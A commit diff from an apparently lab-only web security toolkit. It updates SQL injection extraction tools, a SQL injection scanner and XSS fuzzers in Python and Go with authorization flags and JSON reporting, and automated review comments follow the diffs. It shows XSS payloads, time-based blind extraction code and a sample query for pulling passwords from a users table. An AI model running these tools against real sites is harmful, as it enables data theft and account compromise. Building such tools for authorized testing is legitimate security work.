更新: 359 个文件 - 2026-03-16 23:30:01

这个提交包含在:
hao
2026-03-16 23:30:01 -07:00
父节点 527990f535
当前提交 2974cd9ad9
修改 359 个文件,包含 6332 行新增673 行删除

00-environments/README.md 普通文件

@@ -0,0 +1,16 @@
# 环境编排与靶站目录
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY` | `非生产环境`
本目录承载授权攻防实验的本地靶站编排和复现资产,分为三层:
- `catalog/systems/`
- 每个主流开源 Web 系统的环境供应元数据、默认 artifact 模式和服务提示。
- `profiles/`
- 可执行环境 profile,按 `core/<system>/current.yaml` 存放当前默认复现入口。
- `templates/synthetic/`
- 当历史版本或扩展包无法稳定获取时使用的最小合成靶场模板。
- [catalog](/Users/x/websafe/00-environments/catalog/README.md)
- [profiles](/Users/x/websafe/00-environments/profiles/README.md)
- [synthetic templates](/Users/x/websafe/00-environments/templates/synthetic/README.md)


@@ -0,0 +1,5 @@
# 环境 Catalog
> `LAB ONLY` | 自动生成与维护
`systems/*.yaml` 是每个系统的环境供应真值,用于决定优先走真实版本还是 synthetic 补位。


@@ -0,0 +1,5 @@
# 环境 Profiles
> `LAB ONLY` | 自动生成与维护
`core/<system>/current.yaml` 提供每个系统当前默认的可运行 profile。后续可以按需要扩展到具体版本文件。


@@ -0,0 +1,5 @@
# Synthetic Templates
> `LAB ONLY` | `AUTHORIZED TARGETS ONLY`
当无法稳定获取历史版本、插件包或模块工件时,允许使用最小合成靶场补位。所有 synthetic 结果都必须在案例页和 registry 中显式标注。


@@ -33,6 +33,24 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import Callable, Optional, List from typing import Callable, Optional, List
import sys import sys
from pathlib import Path
import contextlib
import io
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -332,8 +350,10 @@ def main():
) )
parser.add_argument("--true-indicator", help="布尔盲注真值指示器") parser.add_argument("--true-indicator", help="布尔盲注真值指示器")
parser.add_argument("-t", "--threads", type=int, default=1, help="线程数") parser.add_argument("-t", "--threads", type=int, default=1, help="线程数")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
@@ -344,12 +364,7 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
exploit = BlindSQLi( exploit = BlindSQLi(
url=args.url, url=args.url,
@@ -360,32 +375,81 @@ def main():
delay=args.delay, delay=args.delay,
threads=args.threads, threads=args.threads,
) )
exploit.session.headers.update(parse_headers(args.header))
if args.proxy:
exploit.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
exploit._print = lambda *_args, **_kwargs: None # type: ignore[assignment]
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") result = None
print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}") stdout_buffer = io.StringIO()
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") capture = contextlib.redirect_stdout(stdout_buffer) if args.format != "text" else contextlib.nullcontext()
if args.query: with capture:
result = exploit.extract_string( if args.query:
args.query, args.technique, args.dbms, true_indicator=args.true_indicator result = exploit.extract_string(
) args.query, args.technique, args.dbms, true_indicator=args.true_indicator
print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}") )
elif args.extract: elif args.extract:
result = exploit.auto_extract(args.extract, args.dbms, args.technique) result = exploit.auto_extract(args.extract, args.dbms, args.technique)
print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
else: if args.format == "text":
print( print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}" print(f"{Colors.BOLD}Blind SQL Injection Exploit Tool{Colors.END}")
) print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
print(f"\n示例:") if args.query:
print(f" --extract user 提取当前用户") print(f"\n{Colors.GREEN}[+] 结果: {result}{Colors.END}")
print(f" --extract database 提取当前数据库") elif args.extract:
print(f" --extract version 提取数据库版本") print(f"\n{Colors.GREEN}[+] {args.extract}: {result}{Colors.END}")
print(f' --query "SELECT password FROM users LIMIT 1"') else:
print(
f"{Colors.YELLOW}请使用 --query 或 --extract 指定要提取的数据{Colors.END}"
)
print(f"\n示例:")
print(f" --extract user 提取当前用户")
print(f" --extract database 提取当前数据库")
print(f" --extract version 提取数据库版本")
print(f' --query "SELECT password FROM users LIMIT 1"')
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n")
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}\n") evidence_refs = []
ref = write_evidence(
args,
"blind-sqli-result.json",
{
"result": result,
"captured_stdout": stdout_buffer.getvalue()[-1000:],
"technique": args.technique,
"dbms": args.dbms,
},
)
if ref:
evidence_refs.append(ref)
status = "verified" if result else "needs-review"
severity = "high" if result else "medium"
report = make_report(
tool="blind-sqli",
mode=f"{args.technique}-blind-extraction",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"query": args.query, "extract": args.extract, "result": result},
request_summary={"param": args.param, "dbms": args.dbms, "threads": args.threads},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"Blind SQL Injection Exploit Tool",
"=" * 60,
f"Target: {args.url}",
f"Technique: {args.technique}",
f"Result Present: {'yes' if result else 'no'}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
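Review bot: The report assembled at the end of this hunk is emitted even when neither --query nor --extract was given: `result` stays None, `status` becomes "needs-review" and `severity` "medium", and `write_evidence` still records an evidence file when an evidence directory is configured, although no request was sent; with `--format json` the usage hint is also swallowed by the stdout redirect, so the caller only sees what reads like an inconclusive finding. Reject the combination before any work, right after `ensure_authorized(args, parser)`: `if not args.query and not args.extract: parser.error("--query or --extract is required")`. Separately, `result` is written verbatim into `payload_or_probe` and into the evidence file, and the built-in example query is `SELECT password FROM users LIMIT 1`, so extracted credentials land on disk wherever `--evidence-dir` points; a comment above the `write_evidence` call such as `# NOTE: result may hold credential material; the evidence dir must be access-controlled` would warn operators. main() begins before this hunk.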


@@ -2,11 +2,13 @@
package main package main
import ( import (
"encoding/json"
"flag" "flag"
"fmt" "fmt"
"io" "io"
"net/http" "net/http"
"net/url" "net/url"
"os"
"strings" "strings"
"sync" "sync"
"time" "time"
@@ -19,6 +21,9 @@ type SQLiExploit struct {
Param string Param string
Threads int Threads int
Timeout time.Duration Timeout time.Duration
Headers map[string]string
Cookie string
Quiet bool
} }
type InjectionResult struct { type InjectionResult struct {
@@ -51,6 +56,7 @@ func NewSQLiExploit(target, method, param string, threads int, timeout time.Dura
Param: param, Param: param,
Threads: threads, Threads: threads,
Timeout: timeout, Timeout: timeout,
Headers: map[string]string{},
} }
} }
@@ -78,6 +84,12 @@ func (s *SQLiExploit) SendRequest(payload string) (string, int, error) {
} }
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req) resp, err := s.Client.Do(req)
if err != nil { if err != nil {
@@ -120,8 +132,10 @@ func (s *SQLiExploit) TestTimeBased(payloads []struct {
ResponseLen: respLen, ResponseLen: respLen,
}) })
mu.Unlock() mu.Unlock()
fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, payload, elapsed, dbms) fmt.Printf("%s[VULN]%s [Time-based] %s - Delay: %v - DBMS: %s\n",
colorRed+colorBold, colorEnd, payload, elapsed, dbms)
}
} }
}(p.Payload, p.DBMS, p.Delay) }(p.Payload, p.DBMS, p.Delay)
} }
@@ -159,8 +173,10 @@ func (s *SQLiExploit) TestErrorBased(payloads []struct {
DBMS: dbms, DBMS: dbms,
ResponseLen: respLen, ResponseLen: respLen,
}) })
fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, p.Payload, dbms) fmt.Printf("%s[VULN]%s [Error-based] %s - DBMS: %s\n",
colorRed+colorBold, colorEnd, p.Payload, dbms)
}
break break
} }
} }
@@ -173,7 +189,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
var result strings.Builder var result strings.Builder
charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@." charset := "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-@."
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query) if !s.Quiet {
fmt.Printf("\n%s[*]%s Extracting: %s\n", colorCyan, colorEnd, query)
}
for pos := 1; pos <= maxLen; pos++ { for pos := 1; pos <= maxLen; pos++ {
found := false found := false
@@ -197,7 +215,9 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
if elapsed >= 900*time.Millisecond { if elapsed >= 900*time.Millisecond {
result.WriteByte(byte(char)) result.WriteByte(byte(char))
found = true found = true
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String()) if !s.Quiet {
fmt.Printf("\r%s[+]%s Extracted: %s", colorGreen, colorEnd, result.String())
}
break break
} }
} }
@@ -212,6 +232,21 @@ func (s *SQLiExploit) ExtractData(query string, technique string, dbms string, m
return result.String() return result.String()
} }
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() { func main() {
target := flag.String("u", "", "Target URL") target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)") method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -222,25 +257,27 @@ func main() {
extract := flag.String("extract", "", "Data to extract (user/database/version)") extract := flag.String("extract", "", "Data to extract (user/database/version)")
query := flag.String("query", "", "Custom SQL query") query := flag.String("query", "", "Custom SQL query")
dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)") dbms := flag.String("dbms", "mysql", "Database type (mysql/mssql/postgresql)")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse() flag.Parse()
if *target == "" { if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage() flag.Usage()
return return
} }
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sSQL Injection Exploit Tool (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout) exploit := NewSQLiExploit(*target, *method, *param, *threads, *timeout)
exploit.Headers = parseHeaders(*header)
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) exploit.Cookie = *cookie
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method) exploit.Quiet = *format != "text"
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
fmt.Printf("%s[INFO]%s Technique: %s\n", colorBlue, colorEnd, *technique)
timePayloads := []struct { timePayloads := []struct {
Payload string Payload string
@@ -266,14 +303,12 @@ func main() {
} }
var allResults []InjectionResult var allResults []InjectionResult
fmt.Printf("\n%s[*]%s Testing Time-based Injection...\n", colorCyan, colorEnd)
timeResults := exploit.TestTimeBased(timePayloads) timeResults := exploit.TestTimeBased(timePayloads)
allResults = append(allResults, timeResults...) allResults = append(allResults, timeResults...)
fmt.Printf("\n%s[*]%s Testing Error-based Injection...\n", colorCyan, colorEnd)
errorResults := exploit.TestErrorBased(errorPayloads) errorResults := exploit.TestErrorBased(errorPayloads)
allResults = append(allResults, errorResults...) allResults = append(allResults, errorResults...)
extractedResult := ""
if *extract != "" || *query != "" { if *extract != "" || *query != "" {
var extractQuery string var extractQuery string
@@ -310,15 +345,54 @@ func main() {
} }
if extractQuery != "" { if extractQuery != "" {
result := exploit.ExtractData(extractQuery, *technique, *dbms, 100) extractedResult = exploit.ExtractData(extractQuery, *technique, *dbms, 100)
fmt.Printf("\n%s[+]%s Result: %s\n", colorGreen, colorEnd, result)
} }
} }
report := map[string]interface{}{
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd) "tool": "sqli-exploit-go",
fmt.Printf("%s[SUMMARY]%s Found %d vulnerabilities\n", colorGreen, colorEnd, len(allResults)) "mode": *technique + "-probe-and-extract",
for _, r := range allResults { "target": *target,
fmt.Printf(" - [%s] %s - %s\n", r.VulnType, r.DBMS, r.Payload) "status": "needs-review",
"severity": "info",
"timestamp": time.Now().UTC().Format(time.RFC3339),
"request_summary": map[string]interface{}{"method": *method, "param": *param, "threads": *threads, "dbms": *dbms},
"payload_or_probe": map[string]interface{}{"hits": allResults, "extract": *extract, "query": *query, "result": extractedResult},
"evidence_refs": []string{},
"minimal_validation": "只读探测、最小化注入、可审计回显、可回滚验证。",
"authorization_scope": "lab-local, lab-public, authorized-third-party",
"destructive_risk": "medium",
"run_id": *runID,
"case_id": *caseID,
} }
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd) if len(allResults) > 0 || extractedResult != "" {
report["status"] = "verified"
report["severity"] = "high"
}
if *evidenceDir != "" {
_ = os.MkdirAll(*evidenceDir, 0o755)
evidencePath := *evidenceDir + "/sqli-exploit-go.json"
if raw, err := json.MarshalIndent(report, "", " "); err == nil {
_ = os.WriteFile(evidencePath, append(raw, '\n'), 0o644)
report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath)
}
}
var content []byte
if *format == "json" {
content, _ = json.MarshalIndent(report, "", " ")
} else {
lines := []string{
strings.Repeat("=", 60),
"SQL Injection Exploit Tool (Go)",
strings.Repeat("=", 60),
"Target: " + *target,
"Technique: " + *technique,
fmt.Sprintf("Hits: %d", len(allResults)),
"Status: " + report["status"].(string),
}
content = []byte(strings.Join(lines, "\n"))
}
if *output != "" {
_ = os.WriteFile(*output, append(content, '\n'), 0o644)
}
fmt.Println(string(content))
} }
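Review bot: `report["evidence_refs"]` is extended with `evidencePath` even when the write failed, because the `os.WriteFile` error (and the `os.MkdirAll` one before it) is discarded, so a report can cite an evidence file that does not exist; check the result before recording the path: `if err := os.WriteFile(evidencePath, append(raw, '\n'), 0o644); err != nil { fmt.Fprintln(os.Stderr, "[WARN] evidence not written:", err) } else { report["evidence_refs"] = append(report["evidence_refs"].([]string), evidencePath) }`. The same unchecked write happens for `-output`. The authorization gate also reuses the target-missing message: `-u` given without `-ack-authorized` prints "Target URL is required. Use -u flag.", so the operator is not told which condition failed; split it into its own check with its own message. Building the path with `*evidenceDir + "/sqli-exploit-go.json"` rather than `filepath.Join` is a minor portability point.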


@@ -30,6 +30,22 @@ import urllib.parse
from concurrent.futures import ThreadPoolExecutor, as_completed from concurrent.futures import ThreadPoolExecutor, as_completed
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import sys import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -322,12 +338,19 @@ def main():
parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)") parser.add_argument("-p", "--params", help="指定参数 (逗号分隔)")
parser.add_argument("-t", "--threads", type=int, default=5, help="线程数") parser.add_argument("-t", "--threads", type=int, default=5, help="线程数")
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
scanner = SQLiScanner(timeout=args.timeout, threads=args.threads) scanner = SQLiScanner(timeout=args.timeout, threads=args.threads)
scanner.session.headers.update(parse_headers(args.header))
if args.proxy:
scanner.session.proxies.update({"http": args.proxy, "https": args.proxy})
if args.format != "text":
scanner.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {} data = {}
if args.data: if args.data:
@@ -336,32 +359,48 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
params = args.params.split(",") if args.params else None params = args.params.split(",") if args.params else None
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}")
print(f"{Colors.BOLD}SQL Injection Scanner{Colors.END}")
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n")
scanner.print_result("INFO", f"目标: {args.url}") scanner.print_result("INFO", f"目标: {args.url}")
scanner.print_result("INFO", f"方法: {args.method}") scanner.print_result("INFO", f"方法: {args.method}")
results = scanner.scan_url(args.url, args.method, data, cookies, params) results = scanner.scan_url(args.url, args.method, data, cookies, params)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: ref = write_evidence(args, "sqli-results.json", results)
scanner.print_result("SUCCESS", f"发现 {len(results)} 个SQL注入漏洞!") if ref:
for r in results: evidence_refs.append(ref)
print(f" - {r}") status = "verified" if results else "needs-review"
else: severity = "high" if results else "info"
scanner.print_result("INFO", "未发现SQL注入漏洞") report = make_report(
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") tool="sqli-scanner",
mode="non-destructive-sqli-scan",
target=args.url,
status=status,
severity=severity,
payload_or_probe={"hits": results, "params": params or sorted(data.keys())},
request_summary={
"method": args.method,
"params": params or [],
"threads": args.threads,
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="medium",
args=args,
)
text_lines = [
"=" * 60,
"SQL Injection Scanner",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Hits: {len(results)}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
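Review bot: In non-text mode `scanner.print_result` is replaced with a no-op, so whatever `scan_url` reports through it (errors included, presumably, since it is the only output channel used in this hunk) disappears entirely, and a run in which every request failed is indistinguishable in the JSON report from a clean scan: zero hits, status "needs-review", severity "info". Route the suppressed output to stderr instead of dropping it, which keeps stdout clean for the JSON consumer: `scanner.print_result = lambda level, msg, *a, **k: print(f"[{level}] {msg}", file=sys.stderr)`. The `params` value is also reported two different ways, `params or sorted(data.keys())` in `payload_or_probe` and `params or []` in `request_summary`; pick one so the two fields agree. main() begins before this hunk.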


@@ -26,6 +26,23 @@ import re
import urllib.parse import urllib.parse
from typing import List, Dict, Tuple, Optional from typing import List, Dict, Tuple, Optional
import time import time
import sys
from pathlib import Path
SCRIPTS_DIR = Path(__file__).resolve().parents[2] / "scripts"
if str(SCRIPTS_DIR) not in sys.path:
sys.path.insert(0, str(SCRIPTS_DIR))
from tool_contract import ( # noqa: E402
add_common_args,
emit_report,
ensure_authorized,
make_report,
parse_cookie_string,
parse_headers,
write_evidence,
)
class Colors: class Colors:
@@ -345,16 +362,19 @@ def main():
"--all-categories", action="store_true", help="测试所有Payload类别" "--all-categories", action="store_true", help="测试所有Payload类别"
) )
parser.add_argument("--timeout", type=int, default=10, help="超时时间") parser.add_argument("--timeout", type=int, default=10, help="超时时间")
add_common_args(parser)
args = parser.parse_args() args = parser.parse_args()
ensure_authorized(args, parser)
requests.packages.urllib3.disable_warnings() requests.packages.urllib3.disable_warnings()
fuzzer = XSSFuzzer(timeout=args.timeout) fuzzer = XSSFuzzer(timeout=args.timeout)
fuzzer.session.headers.update(parse_headers(args.header))
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") if args.proxy:
print(f"{Colors.BOLD}XSS Fuzzer{Colors.END}") fuzzer.session.proxies.update({"http": args.proxy, "https": args.proxy})
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") if args.format != "text":
fuzzer.print_result = lambda *_args, **_kwargs: None # type: ignore[assignment]
data = {} data = {}
if args.data: if args.data:
@@ -363,13 +383,9 @@ def main():
k, v = pair.split("=", 1) k, v = pair.split("=", 1)
data[k] = v data[k] = v
cookies = {} cookies = parse_cookie_string(args.cookie)
if args.cookie:
for pair in args.cookie.split(";"):
if "=" in pair:
k, v = pair.strip().split("=", 1)
cookies[k] = v
csp_result = {"has_csp": False, "weaknesses": []}
if args.check_csp: if args.check_csp:
fuzzer.print_result("INFO", "检查 CSP 策略...") fuzzer.print_result("INFO", "检查 CSP 策略...")
csp_result = fuzzer.check_csp(args.url, cookies) csp_result = fuzzer.check_csp(args.url, cookies)
@@ -384,6 +400,7 @@ def main():
for w in csp_result["weaknesses"]: for w in csp_result["weaknesses"]:
fuzzer.print_result("WARNING", f" - {w}") fuzzer.print_result("WARNING", f" - {w}")
dom_results = []
if args.dom_scan: if args.dom_scan:
fuzzer.print_result("INFO", "扫描 DOM XSS...") fuzzer.print_result("INFO", "扫描 DOM XSS...")
dom_results = fuzzer.scan_dom_xss(args.url, cookies) dom_results = fuzzer.scan_dom_xss(args.url, cookies)
@@ -396,18 +413,58 @@ def main():
fuzzer.print_result("INFO", "上下文分析:") fuzzer.print_result("INFO", "上下文分析:")
for ctx, status in context.items(): for ctx, status in context.items():
color = Colors.YELLOW if status == "未过滤" else Colors.GREEN color = Colors.YELLOW if status == "未过滤" else Colors.GREEN
print(f" {color}{ctx}: {status}{Colors.END}") if args.format == "text":
print(f" {color}{ctx}: {status}{Colors.END}")
results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies) results = fuzzer.test_reflected(args.url, args.param, args.method, data, cookies)
print(f"\n{Colors.BOLD}{'=' * 60}{Colors.END}") evidence_refs = []
if results: for name, payload in [
fuzzer.print_result("SUCCESS", f"发现 {len(results)} 个 XSS 漏洞!") ("xss-context.json", context),
for r in results: ("xss-reflected.json", results),
print(f" - [{r['category']}] {r['param']}: {r['payload'][:60]}...") ("xss-dom.json", dom_results),
else: ("xss-csp.json", csp_result),
fuzzer.print_result("INFO", "未发现反射型 XSS 漏洞") ]:
print(f"{Colors.BOLD}{'=' * 60}{Colors.END}\n") ref = write_evidence(args, name, payload)
if ref:
evidence_refs.append(ref)
status = "verified" if results else "suspected" if dom_results or csp_result.get("weaknesses") else "needs-review"
severity = "high" if results else "medium" if dom_results else "low" if csp_result.get("weaknesses") else "info"
report = make_report(
tool="xss-fuzzer",
mode="dom-and-reflected-xss",
target=args.url,
status=status,
severity=severity,
payload_or_probe={
"reflected_hits": results,
"dom_hits": dom_results,
"context": context,
"csp": csp_result,
},
request_summary={
"method": args.method,
"param": args.param,
"has_body_template": bool(args.data),
"header_names": sorted(parse_headers(args.header).keys()),
},
evidence_refs=evidence_refs,
destructive_risk="low",
args=args,
)
text_lines = [
"=" * 60,
"XSS Fuzzer",
"=" * 60,
f"Target: {args.url}",
f"Method: {args.method}",
f"Param: {args.param}",
f"Reflected Hits: {len(results)}",
f"DOM Findings: {len(dom_results)}",
f"CSP Weaknesses: {len(csp_result.get('weaknesses', []))}",
f"Status: {status}",
]
emit_report(args, report, text_lines)
if __name__ == "__main__": if __name__ == "__main__":
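Review bot: The report cannot distinguish "check not run" from "nothing found": `csp_result` defaults to `{"has_csp": False, "weaknesses": []}` and `dom_results` to `[]` whenever `--check-csp` or `--dom-scan` is omitted, so the JSON `csp` block reads as "no CSP configured" and the text summary prints "DOM Findings: 0" for checks that never executed. Record what actually ran in `request_summary`, e.g. `"csp_checked": args.check_csp, "dom_scanned": args.dom_scan`, and add a comment above the defaults: `# defaults mean "not checked", not "absent"`. The two nested conditional expressions that derive `status` and `severity` would read better as one small if/elif chain that sets both values together, so the ladder (verified/high, suspected/medium, suspected/low, needs-review/info) is visible in one place. main() begins before this hunk.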


@@ -7,11 +7,13 @@
package main package main
import ( import (
"encoding/json"
"flag" "flag"
"fmt" "fmt"
"io" "io"
"net/http" "net/http"
"net/url" "net/url"
"os"
"regexp" "regexp"
"strings" "strings"
"sync" "sync"
@@ -30,6 +32,9 @@ type XSSScanner struct {
Threads int Threads int
Timeout time.Duration Timeout time.Duration
Payloads map[string][]string Payloads map[string][]string
Headers map[string]string
Cookie string
Quiet bool
} }
var ( var (
@@ -52,6 +57,7 @@ func NewXSSScanner(threads int, timeout time.Duration) *XSSScanner {
}, },
Threads: threads, Threads: threads,
Timeout: timeout, Timeout: timeout,
Headers: map[string]string{},
Payloads: map[string][]string{ Payloads: map[string][]string{
"basic": { "basic": {
"<script>alert(1)</script>", "<script>alert(1)</script>",
@@ -110,6 +116,12 @@ func (s *XSSScanner) SendRequest(targetURL, method, param, payload string) (stri
} }
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36") req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36")
for k, v := range s.Headers {
req.Header.Set(k, v)
}
if s.Cookie != "" {
req.Header.Set("Cookie", s.Cookie)
}
resp, err := s.Client.Do(req) resp, err := s.Client.Do(req)
if err != nil { if err != nil {
@@ -150,8 +162,10 @@ func (s *XSSScanner) ScanURL(targetURL, method, param string) []XSSResult {
Category: cat, Category: cat,
}) })
mu.Unlock() mu.Unlock()
fmt.Printf("%s[VULN]%s [%s] %s - %s\n", if !s.Quiet {
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))]) fmt.Printf("%s[VULN]%s [%s] %s - %s\n",
colorRed+colorBold, colorEnd, cat, param, p[:min(50, len(p))])
}
} }
}(category, payload) }(category, payload)
} }
@@ -234,6 +248,21 @@ func min(a, b int) int {
return b return b
} }
func parseHeaders(raw string) map[string]string {
headers := map[string]string{}
if raw == "" {
return headers
}
for _, part := range strings.Split(raw, ",") {
pair := strings.SplitN(part, ":", 2)
if len(pair) != 2 {
continue
}
headers[strings.TrimSpace(pair[0])] = strings.TrimSpace(pair[1])
}
return headers
}
func main() { func main() {
target := flag.String("u", "", "Target URL") target := flag.String("u", "", "Target URL")
method := flag.String("m", "GET", "HTTP Method (GET/POST)") method := flag.String("m", "GET", "HTTP Method (GET/POST)")
@@ -242,53 +271,105 @@ func main() {
timeout := flag.Duration("timeout", 10*time.Second, "Request timeout") timeout := flag.Duration("timeout", 10*time.Second, "Request timeout")
checkCSP := flag.Bool("check-csp", false, "Check CSP headers") checkCSP := flag.Bool("check-csp", false, "Check CSP headers")
domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS") domScan := flag.Bool("dom-scan", false, "Scan for DOM XSS")
header := flag.String("header", "", "Extra headers in Name:Value,Name2:Value2 format")
cookie := flag.String("cookie", "", "Cookie header value")
format := flag.String("format", "text", "Output format: text or json")
output := flag.String("output", "", "Write output to file")
evidenceDir := flag.String("evidence-dir", "", "Optional evidence directory")
runID := flag.String("run-id", "", "Associated run ID")
caseID := flag.String("case-id", "", "Associated case ID")
ackAuthorized := flag.Bool("ack-authorized", false, "Confirm the target is owned or authorized")
flag.Parse() flag.Parse()
if *target == "" { if *target == "" || !*ackAuthorized {
fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd) fmt.Printf("%s[ERROR]%s Target URL is required. Use -u flag.\n", colorRed, colorEnd)
flag.Usage() flag.Usage()
return return
} }
fmt.Printf("\n%s%s%s\n", colorBold, strings.Repeat("=", 60), colorEnd)
fmt.Printf("%sXSS Scanner (Go)%s\n", colorBold, colorEnd)
fmt.Printf("%s%s%s\n\n", colorBold, strings.Repeat("=", 60), colorEnd)
scanner := NewXSSScanner(*threads, *timeout) scanner := NewXSSScanner(*threads, *timeout)
scanner.Headers = parseHeaders(*header)
scanner.Cookie = *cookie
scanner.Quiet = *format != "text"
fmt.Printf("%s[INFO]%s Target: %s\n", colorBlue, colorEnd, *target) cspResult := map[string]interface{}{"has_csp": false, "weaknesses": []string{}}
fmt.Printf("%s[INFO]%s Method: %s\n", colorBlue, colorEnd, *method)
fmt.Printf("%s[INFO]%s Parameter: %s\n", colorBlue, colorEnd, *param)
if *checkCSP { if *checkCSP {
fmt.Printf("\n%s[*]%s Checking CSP...\n", colorCyan, colorEnd) cspResult = scanner.CheckCSP(*target)
